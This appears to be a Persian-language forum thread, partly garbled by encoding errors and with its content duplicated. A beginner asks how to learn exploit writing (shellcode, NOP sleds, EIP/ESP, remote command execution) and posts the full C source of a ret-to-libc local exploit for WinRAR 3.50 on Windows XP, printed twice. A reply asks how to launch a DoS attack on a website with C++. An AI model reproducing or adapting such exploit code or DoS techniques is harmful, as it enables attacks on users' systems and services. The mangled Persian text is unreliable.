سلام دوستان
اومدم با کمک شما اکسپلویت نویسی را شروع کنم!!!
آموزش Ùˆ اصول اکسپلویت نویسی Ù…ÛŒ خواستم مقاله یا Ùیلم بزارید .
C++وasmکمی بلدم و دارم روش کار می کنم .
Local ÙˆremoteÚ†Ù‡ Ùرقی باهم دارند؟
از دوستان خواهش می کنم هر اطلاعاتی در زمینه ی اکسپلویت نویسی دارند قرار دهند تا من هم بتونم اکسپلویت نویسی را شروع و یاد بگیریم.
چقدر باید زبان برنامه نویسی بلد باشیم ؟
اگه میشه آموزشی اسمبلی را برای Exploit نویسی بدید؟
آموزش پیدا کردن باگ تو ی سایت ها و برنامه را می خواستم ؟
دوستان اگه میشه من یه اکسپلویت می زارم و می خواهم خط به خط و کامل آنالیز بشه تا من کمی بیشتر آشنا شوم که مربوط به میشه .winrar برنامه
این NOP ها چیه هستد Ùˆ چرا باید در شلکد از آن ها استÙاده کنیم؟
یه ØªÙˆØ¶ÛŒØ Ø¯Ø±Ø¨Ø§Ø±Ù‡ ÛŒ Remote Command Execution Ù…ÛŒ خواستم Ùقط کامل باشه!؟؟
مقاله ای در باره ی آسیب پذیری های رایج در سایت ها می خواستم ؟
چرا در پیدا کردن باگ Ùقط باید به مقادیر Eip ,Esp توجه داشته باشیم؟
دربا ره ÛŒ Shell Code ها هم Ù…ÛŒ خواستم یه ØªÙˆØ¶ÛŒØ Ú©Ø§Ù…Ù„ Ùˆ عالی بدید .
وقتی ما شل کدی را در اکسپلویت می زاریم و اجرا می کنیم اون شل کد چه کاری انجام می دهد؟
اکسپلویت نویسی برای ویندوز Ùˆ لینوکس Ú†Ù‡ جوریه Ùˆ تÙاوت هر کدام در چیست؟
بین gdbو olly کدام قوی تر وبهتر هستند؟
امیدوارم با کمک شما دوستان و تلاش خودم بتونم اکسپلویت نویسی را کامل یاد بگیرم !!!
مرسی !!!!!!!!!!!!!!!!
گناه ما علم ماست!!!
اومدم با کمک شما اکسپلویت نویسی را شروع کنم!!!
آموزش Ùˆ اصول اکسپلویت نویسی Ù…ÛŒ خواستم مقاله یا Ùیلم بزارید .
C++وasmکمی بلدم و دارم روش کار می کنم .
Local ÙˆremoteÚ†Ù‡ Ùرقی باهم دارند؟
از دوستان خواهش می کنم هر اطلاعاتی در زمینه ی اکسپلویت نویسی دارند قرار دهند تا من هم بتونم اکسپلویت نویسی را شروع و یاد بگیریم.
چقدر باید زبان برنامه نویسی بلد باشیم ؟
اگه میشه آموزشی اسمبلی را برای Exploit نویسی بدید؟
آموزش پیدا کردن باگ تو ی سایت ها و برنامه را می خواستم ؟
دوستان اگه میشه من یه اکسپلویت می زارم و می خواهم خط به خط و کامل آنالیز بشه تا من کمی بیشتر آشنا شوم که مربوط به میشه .winrar برنامه
/*
local exploit for winrar <= 3.50 ENG version
bug is 0day
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ( int argc, char *argv[] )
{
long sys_addr = 0x77C18044; // winxp sp0 targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
char buf[3000];
char cmd[3000];
if ( argc < 2 )
{
printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
exit(0);
}
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 516);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
sprintf(cmd, "%s %s", argv[1], buf);
system(cmd);
}
با Ú†Ù‡ دستوری Ù…ÛŒ توانیم توی c++به یه سایت Øمله ÛŒDOS انجام بدیم؟local exploit for winrar <= 3.50 ENG version
bug is 0day
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ( int argc, char *argv[] )
{
long sys_addr = 0x77C18044; // winxp sp0 targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
char buf[3000];
char cmd[3000];
if ( argc < 2 )
{
printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
exit(0);
}
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 516);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
sprintf(cmd, "%s %s", argv[1], buf);
system(cmd);
}
این NOP ها چیه هستد Ùˆ چرا باید در شلکد از آن ها استÙاده کنیم؟
یه ØªÙˆØ¶ÛŒØ Ø¯Ø±Ø¨Ø§Ø±Ù‡ ÛŒ Remote Command Execution Ù…ÛŒ خواستم Ùقط کامل باشه!؟؟
مقاله ای در باره ی آسیب پذیری های رایج در سایت ها می خواستم ؟
چرا در پیدا کردن باگ Ùقط باید به مقادیر Eip ,Esp توجه داشته باشیم؟
دربا ره ÛŒ Shell Code ها هم Ù…ÛŒ خواستم یه ØªÙˆØ¶ÛŒØ Ú©Ø§Ù…Ù„ Ùˆ عالی بدید .
وقتی ما شل کدی را در اکسپلویت می زاریم و اجرا می کنیم اون شل کد چه کاری انجام می دهد؟
اکسپلویت نویسی برای ویندوز Ùˆ لینوکس Ú†Ù‡ جوریه Ùˆ تÙاوت هر کدام در چیست؟
بین gdbو olly کدام قوی تر وبهتر هستند؟
امیدوارم با کمک شما دوستان و تلاش خودم بتونم اکسپلویت نویسی را کامل یاد بگیرم !!!
مرسی !!!!!!!!!!!!!!!!
گناه ما علم ماست!!!
Comment